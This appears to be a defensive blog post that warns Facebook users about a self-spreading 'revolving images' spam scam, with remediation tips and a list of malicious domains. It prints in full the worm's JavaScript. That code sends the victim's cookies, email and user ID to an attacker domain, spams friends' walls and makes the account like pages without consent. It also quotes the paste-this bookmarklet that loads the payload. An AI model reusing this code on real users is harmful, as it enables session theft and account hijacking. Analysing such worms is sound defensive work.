Be Alert From Malicious Scripts & Spam on Facebook

While Analyzing Malicious scripts & codes used by crackers & spammers I found out that crackers and spammers are using different attack vectors & techniques to compromise innocent users pofiles and to spam using automated techniques in which they post a comment in users profile or send them a new application(many times fake) to use for example on facebook or any other social networking profile.


If the user click on that posted Link or uses that New Application(many times fake) mostly the users account got compromised if the site is vulnerable to the malicious code or if its a kinda a Zeroday exploit & sometimes the innocent users profile is bombard with spam messages, comments, posts, ads & fake Application use requests all these spams also automatically got posted or sended to all your friends f the users profile.


So guy if you get a wall post by some of your friend saying some revolving image, new theme thing is out view the link to enjoy it & the message would be like this......



Example 1:
Wowww !! cool Facebook revolving images. MUST SEE http://pageragei.tk/

Example 1:
Super cool Facebook revolving images. MUST SEE http://showmyprofile.tk/


When you open any of these malicous sites, these sites will asks you to copy & paste some JavaScript code like.......



Code :

javascript:(a = (b = document).createElement("script")).src = "//imaginemonkeys.com/majic.js?show", b.body.appendChild(a); void(0)

And when you enter press after copying & pasting that code in your browser that will will redirects you to a malicous java script the link and when you post it in your Facebook account Address bar...

Thats it you start spamming automatically to all your facebook friends wall and the Fire keeps increasing as more and more your friends will click on that malicious code.

the malicious java script code link is: http://imaginemonkeys.com/majic.js

This link has a again a same kind of code but this time the url link in the code is differ......

Code:

javascript:(a = (b = document).createElement("script")).src = "//graphicgiants.com/majic.js?show", b.body.appendChild(a); void(0)

This time the link is: http://graphicgiants.com/majic.js

And when I tried to open it directly in the browser it block me to further analyze it showed me an error message as below mentioned:

Not Found 

The requested URL /majic.js was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

---

Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.graphicgiants.com Port 80

 

 

So now I new something is fishy going on there as the site has some kinda authencation mechanisms & also it has mode security install on it to block unauthorised users, so to further analyze it more I opened & used that malicous code in a testing and secure virtual environment with a profile for testing and while doing the whole process i used the sniffer to see the background re-directions to other urls, malicious codes I also crawled the other url of that site.

So I found out that the redirections was to the facebook site whenever a user opens that http://imaginemonkeys.com site directly in the browser and it will first redirect user to the 

http://1.88.channel.facebook.com & then to the http://facebook.com official site.

While testing the url inside the imaginemonkeys.com i found out that it has few more links like http://www.imaginemonkeys.com/606/ http://www.imaginemonkeys.com/majic.js etc.

The Script which runs inside the JS means Java Script which is mostly majic.js or the index.php file is

it will show a url like :http://www.imaginemonkeys.com/majic.js OR http://imaginemonkeys.com/index.php

The hidden inside the malicious script is mentioned below.


Code: 

//
//
txt = "Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/";
txtee = "Checkout 360 revolve effect on images. MUST SEE http://revolvingimages.info/fb/";

alert("Please wait 2-3 mins while we setup! Do not refresh this window or click any link.");

with(x = new XMLHttpRequest())
open("GET", "/"), onreadystatechange = function () {

if (x.readyState == 4 && x.status == 200) {
comp = (z = x.responseText).match(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];
form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];
pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
appid = "150622878317085";
appname = "rip_m_j";

with(xx = new XMLHttpRequest())
open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&filter=all&__a=1&__d=1"),
onreadystatechange = function () { if (xx.readyState == 4 && xx.status == 200) {
m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
i = 0; llimit=25;
t = setInterval(function () {
if (i >= llimit ) return;
if(i == 0) {
with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&__d=1"),
setRequestHeader("X-Requested-With", null),
setRequestHeader("X-Requested", null),
onreadystatechange = function(){ if(ddddd.readyState == 4 && ddddd.status == 200){ llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); aaac =llm.length; pplp=0; for(pplp=0;pplp([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }
}, send(null);
with(xxcxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=176607175684946&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");
with(lllllxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=150650771629477&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");
with(llxlxlxlxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=109075015830180&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");
} else if (i == llimit - 1) {
with(xxxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"),
setRequestHeader("X-Requested-With", null),
setRequestHeader("X-Requested", null),
onreadystatechange = function(){
if(xxxx.readyState == 4 && xxxx.status == 200){
with(s = document.createElement("script")) src = "http://revolvingimages.info/majic.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }
}, send(null);
}
if(i%2==0) {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
}
else {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest"); } i += 1;
}, 2000); }
}, send(null);
}
}, send(null);

Some of the Websites you should not visit if you see below :

http://pageragei.tk/

http://showmyprofile.tk/
http://fbpictures.tk
http://imaginemonkeys.com/fb/
http://fbimages.tk
http://fbookcoolimages.tk/
http://herohide.com/browse.php?
http://www.revolvingimages.info/fb/
http://revolvingimages2.tk/
http://graphicgiants.com/
http://zizz.co.tv/


New domains keep coming by crackers & spammers so be aware never click on unknown links....



HOW TO STOP IT ?

1. To stop it spamming to your wall simply re-generate your mobile email unique address at
     http://www.facebook.com/mobile/ 

2. Change your password also delete all your browers cookies, browsing history & saved passwords.

3. Don't copy/pasting javascript or any ther unknown scripts into your browser again.

4. And mostly importantly never click on unknown links always check your browsers url bar that
     it has https or http://www.facebook.com not phising or fake sites like http://www.faacebook or
     http://www.faceb00k.com.

5. Use Good Security Suite Softwares like AVG 2011 or Norton 2011 or any other and always update
     its virus definitions and program components these security suite has all type of security softwares
     in-built like Antivirus, Anti-Spyware, Anti-Spam, Anti-Phising, Firewall & IDS etc.

6. Keep your Operating System always updated and also update all of your application softwares like
    the browser itself.

So Be Cautious Guys whenever you see comments like:Great now we have such Applications in Facebook & never use these applications nor accept these applications use requests.


Two Applications which I found out is just popping up is See Who Has Visited Your Profile Profile Privacy v1.2. So please remember that these are FAKE APPLICATION and use such comments on other users wall to click or use them.


I hope my post is helpful for all of you guys :) comments are welcome.